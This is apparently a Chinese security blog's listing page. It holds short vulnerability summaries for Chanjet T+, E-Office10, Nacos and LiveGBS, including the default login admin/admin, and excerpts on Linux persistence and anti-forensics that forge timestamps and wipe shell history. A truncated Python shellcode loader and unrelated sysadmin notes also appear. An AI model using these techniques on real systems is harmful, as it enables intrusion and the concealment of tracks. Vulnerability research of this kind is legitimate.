nglj9527的博客

用友 畅捷通T+ GetStoreWarehouseByStore RCE漏洞可执行命令。

用友 畅捷通T+ ScheduleManageController 存在SQL注入漏洞，执行sql语句，获取数据库信息。

用友 畅捷通T+ MultiCompanyController 存在SQL注入漏洞，执行sql语句，获取数据库信息。

用友 畅捷通T+ getdecallusers 存在信息泄露漏洞，可获取系统用户个人信息。

用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞(QVD-2023-20016)复现。

泛微E-Offiсе10是一款企业级办公自动化系统，主要用于优化和管理企业的文档、信息流转、协作与沟通工作流程。E-Offiсе10存在远程代码执行漏洞。由于系统处理上传的PHAR文件时存在缺陷，未经身份验证的远程攻击者能够上传伪装的PHAR文件到服务器，利用PHP处理PＨAR文件时自动进行的反序列化机制来触发远程代码执行。

漏洞位于/userLogin.asp页面，通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg，可获取设备配置文件，进而获得WEB管理账号及密码。

Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中，当配置为使用身份验证（-Dnасоѕ.соrе.аuth.еnаblеd=truе）时，Nасоѕ 使用 AuthFilｔеr ѕеrvｌеt 过滤器强制执行身份验证。该过滤器有一个后门，使 Nасоѕ 服务器能够绕过该过滤器，从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头，因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。。

网动统一通信平台存在任意文件下载漏洞。

（附Nuclei模板）LiveGBS是一款国标(GB28181)流媒体服务软件，可提供提供用户管理及Web可视化页面管理，开源的前端页面源码；提供设备状态管理，可实时查看设备是否掉线等信息等。安徽青柿信息科技有限公司LiveGBS存在弱口令漏洞，admin/admin。

LiveGBS是一款国标(GB28181)流媒体服务软件，可提供提供用户管理及Web可视化页面管理，开源的前端页面源码；提供设备状态管理，可实时查看设备是否掉线等信息等。安徽青柿信息科技有限公司LiveGBS存在逻辑缺陷漏洞，攻击者可利用该漏洞任意添加用户。

masscan项目未提供编译好的exe文件，需要自行下载编译。masscan下载地址：https://github.com/robertdavidgraham/masscanvs2019免费版下载地址：https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?

老电脑奔腾4CPU，4G内存，装上win7之后不算太卡，但CPU占用一直很高。

windows权限维持权限维持要点文件隐藏用户隐藏权限维持要点1、权限维持最重要的是隐藏。2、只需在入口等关键点做权限维持即可本文从文件隐藏、用户隐藏、添加自动任务几方面记录自己的学习内容

文章目录文件及操作记录隐藏SUID建立sshd的软连接用于登录文件及操作记录隐藏1、文件建立日期更改：touch -r 已存在文件 新增文件使用效果：新增文件日期更改为与已存在文件创建日期一致2、文件锁定添加锁定：chattr +i 文件解除锁定：chattr -i 文件查看文件状态：lsattr3、隐藏历史命令set +o history #不记录命令history -d 命令序号 #删除为该序号的记录set -o history #重新开始记录命令sed -i ‘1,200d

python实现shellcode加载器名词解释代码名词解释shellcode：一段可以由电脑直接执行的机器码，执行后可以搭建起stranger。加载器：将shellcode加载进内存，并开始执行的程序。代码import ctypesimport base64import requestsshellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\

一加8t，root变砖后通过9008刷回原系统使用设备：小米pro笔记本（win10家庭版）、一加八t、手机原装数据线准备工作：下载qualcomm usb host driver程序、下载一加8t线刷包。线刷包：链接：https://pan.baidu.com/s/1dquAXoM9hrTqK4xq9hmIsQ 提取码：fp5y驱动：链接：https://pan.baidu.com/s/1pGLvFwnG4_6pK-Ndx6R-7Q 提取码：fp5y步骤一、禁用win10驱动签名，否则在q

Linux目录结构bin：可执行文件（普通用户可以使用）sbin：可执行文件（特权用户可以使用）root：root用户专用run：运行目录boot：启动文件tmp:临时目录usr：应用程序opt：第三方程序安装目录linux文件类型-：普通文件（文本文件二进制文件压缩文件等）d:目录文件b：设备文件（块设备）存储设备硬盘。c：设备文件（字符设备）打印机，终端/dev/tty1l：链接文件s：套接字文件p：管道文件linux文件及目录创建touch 路径及文件名mkdir

centos常用命令重启网络firewall相关ssh配置相关配置IP地址时间同步主机名重启网络（1）systemctl restart network（2）/etc/rc.d/init.d/network restartfirewall相关firewall-cmd --reload #重载防火墙firewall-cmd --port-list #查看允许通过的端口firewall-cmd --permanent --add-port=12345/tcp #添加允许通过的端口ssh配置相关

打开vi 路径及文件名命令模式编辑i 进入编辑模式查找刚进入vi是命令模式，在命令模式/string 回车可查找字符串。替换:范围 s/原内容/新内容/全局例子 :1,5 s/root/admin/g保存:w 保存:w 路径及文件名（另存为）:wq 保存并退出:q! 不保存强制退出其他:set nu 设置行号:set list 显示特殊字符:set nonu取消行号gg 光标移动到页首G 光标移动到页尾可视化模式v:进入可视化模式在可视化模式下可用光标选中文字，